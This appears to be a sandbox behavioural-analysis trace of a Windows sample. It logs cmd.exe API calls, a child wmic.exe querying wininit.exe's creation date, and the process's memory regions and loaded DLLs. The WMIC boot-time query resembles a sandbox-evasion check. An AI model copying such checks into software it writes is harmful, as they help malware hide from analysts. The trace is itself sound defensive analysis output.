[0561.754] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] GetFileType (hFile=0x7) returned 0x2
[0561.756] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0561.756] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef4a8 | out: lpMode=0x2ef4a8) returned 1
[0561.756] _dup (_FileHandle=1) returned 3
[0561.757] _close (_FileHandle=1) returned 0
[0561.758] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0561.758] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef458, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58
[0561.813] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 1
[0561.813] GetProcessHeap () returned 0x420000
[0561.813] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x218) returned 0x439280
[0561.813] GetProcessHeap () returned 0x420000
[0561.814] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1e) returned 0x434870
[0561.814] SetErrorMode (uMode=0x0) returned 0x0
[0561.814] SetErrorMode (uMode=0x1) returned 0x0
[0561.814] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4394b0, lpFilePart=0x2ef220 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef220*="system32") returned 0x13
[0561.814] SetErrorMode (uMode=0x0) returned 0x1
[0561.814] GetProcessHeap () returned 0x420000
[0561.814] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4394a0, Size=0x42) returned 0x4394a0
[0561.814] GetProcessHeap () returned 0x420000
[0561.814] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4394a0) returned 0x42
[0561.814] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.814] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.814] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x439500
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x4396e0
[0561.815] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4396e0, Size=0x1d0) returned 0x4396e0
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4396e0) returned 0x1d0
[0561.815] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x4398c0
[0561.815] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4398c0, Size=0x7e) returned 0x4398c0
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4398c0) returned 0x7e
[0561.815] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.815] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x436080
[0561.816] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.816] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x436080
[0561.816] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.816] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0561.816] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0561.816] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0561.817] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef258 | out: lpAttributeList=0x2ef298, lpSize=0x2ef258) returned 1
[0561.817] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef298, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef298, lpPreviousValue=0x0) returned 1
[0561.817] GetStartupInfoW (in: lpStartupInfo=0x2ef3b0 | out: lpStartupInfo=0x2ef3b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0561.817] lstrcmpW (lpString1="\\more.com", lpString2="\\XCOPY.EXE") returned -1
[0561.817] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\more.com", lpCommandLine="more ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2ef2d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="more ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef280 | out: lpCommandLine="more ", lpProcessInformation=0x2ef280*(hProcess=0x6c, hThread=0x5c, dwProcessId=0x4dc, dwThreadId=0x368)) returned 1
[0561.826] CloseHandle (hObject=0x5c) returned 1
[0561.826] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0561.827] GetProcessHeap () returned 0x420000
[0561.828] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43fe40 | out: hHeap=0x420000) returned 1
[0561.828] GetEnvironmentStringsW () returned 0x43fe40*
[0561.828] GetProcessHeap () returned 0x420000
[0561.828] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb78) returned 0x4449e0
[0561.828] memcpy (in: _Dst=0x4449e0, _Src=0x43fe40, _Size=0xb78 | out: _Dst=0x4449e0) returned 0x4449e0
[0561.828] FreeEnvironmentStringsW (penv=0x43fe40) returned 1
[0561.828] GetProcessHeap () returned 0x420000
[0561.828] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a470 | out: hHeap=0x420000) returned 1
[0561.828] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef298 | out: lpAttributeList=0x2ef298)
[0561.828] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0561.830] _close (_FileHandle=3) returned 0
[0561.831] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0
[0561.831] _close (_FileHandle=4) returned 0
[0561.832] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0566.701] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x2ef7b8 | out: lpExitCode=0x2ef7b8*=0x0) returned 1
[0566.701] CloseHandle (hObject=0x64) returned 1
[0566.701] WaitForSingleObject (hHandle=0x6c, dwMilliseconds=0xffffffff) returned 0x0
[0566.701] GetExitCodeProcess (in: hProcess=0x6c, lpExitCode=0x2ef7b8 | out: lpExitCode=0x2ef7b8*=0x0) returned 1
[0566.701] CloseHandle (hObject=0x6c) returned 1
[0566.701] _get_osfhandle (_FileHandle=1) returned 0x7
[0566.701] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0566.702] _get_osfhandle (_FileHandle=1) returned 0x7
[0566.702] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a07e194 | out: lpMode=0x4a07e194) returned 1
[0566.702] _get_osfhandle (_FileHandle=0) returned 0x3
[0566.702] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a07e198 | out: lpMode=0x4a07e198) returned 1
[0566.703] SetConsoleInputExeNameW () returned 0x1
[0566.703] GetConsoleOutputCP () returned 0x1b5
[0566.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a08bfe0 | out: lpCPInfo=0x4a08bfe0) returned 1
[0566.704] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0566.704] exit (_Code=0)
Process:
id = "32"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x66376000"
os_pid = "0x520"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "31"
os_parent_pid = "0x740"
cmd_line = "WMIC PROCESS where name=\"wininit.exe\" get creationdate "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4790
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4791
start_va = 0x30000
end_va = 0xaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 4792
start_va = 0xb0000
end_va = 0xb3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000b0000"
filename = ""
Region:
id = 4793
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 4794
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4795
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4796
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4797
start_va = 0xffa60000
end_va = 0xffaecfff
monitored = 1
entry_point = 0xffaacc30
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 4798
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4799
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4800
start_va = 0x7fffffd5000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4801
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4802
start_va = 0xd0000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4803
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4804
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4805
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4806
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4807
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4808
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4809
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4810
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 4811
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4812
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4813
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4814
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4835
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4836
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4837
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4838
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4839
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4840
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4846
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 4861
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4865
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4866
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4867
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4868
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 4869
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4870
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4871
start_va = 0x140000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 4872
start_va = 0x370000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 4873
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4874
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 4875
start_va = 0x470000
end_va = 0x5f7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 4876
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4877
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4878
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4879
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 4880
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 4881
start_va = 0x140000
end_va = 0x14ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 4882
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 4883
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 4884
start_va = 0x190000
end_va = 0x20cfff
monitored = 0
entry_point = 0x19cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4885
start_va = 0x190000
end_va = 0x20cfff
monitored = 0
entry_point = 0x19cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4886
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4887
start_va = 0x1be0000
end_va = 0x1c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001be0000"
filename = ""
Region:
id = 4888
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4889
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 4890
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4891
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 4892
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4893
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4894
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4895
start_va = 0x1c60000
end_va = 0x1f2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4896
start_va = 0x7fef5970000
end_va = 0x7fef5b43fff
monitored = 0
entry_point = 0x7fef59a6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 4903
start_va = 0x1f30000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 4904
start_va = 0x1a0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4905
start_va = 0x2050000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002050000"
filename = ""
Region:
id = 4906
start_va = 0x2130000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 4907
start_va = 0x2270000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 4908
start_va = 0x2390000
end_va = 0x259ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 4909
start_va = 0x2390000
end_va = 0x24bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 4910
start_va = 0x2520000
end_va = 0x259ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 4911
start_va = 0x2130000
end_va = 0x21effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 4912
start_va = 0x21f0000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 4913
start_va = 0x25a0000
end_va = 0x299ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 4914
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 4915
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 4916
start_va = 0x1b0000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4917
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4918
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4919
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4920
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4921
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4922
start_va = 0x250000
end_va = 0x251fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 4923
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4924
start_va = 0x260000
end_va = 0x260fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4925
start_va = 0x1b90000
end_va = 0x1b91fff
monitored = 1
entry_point = 0x0
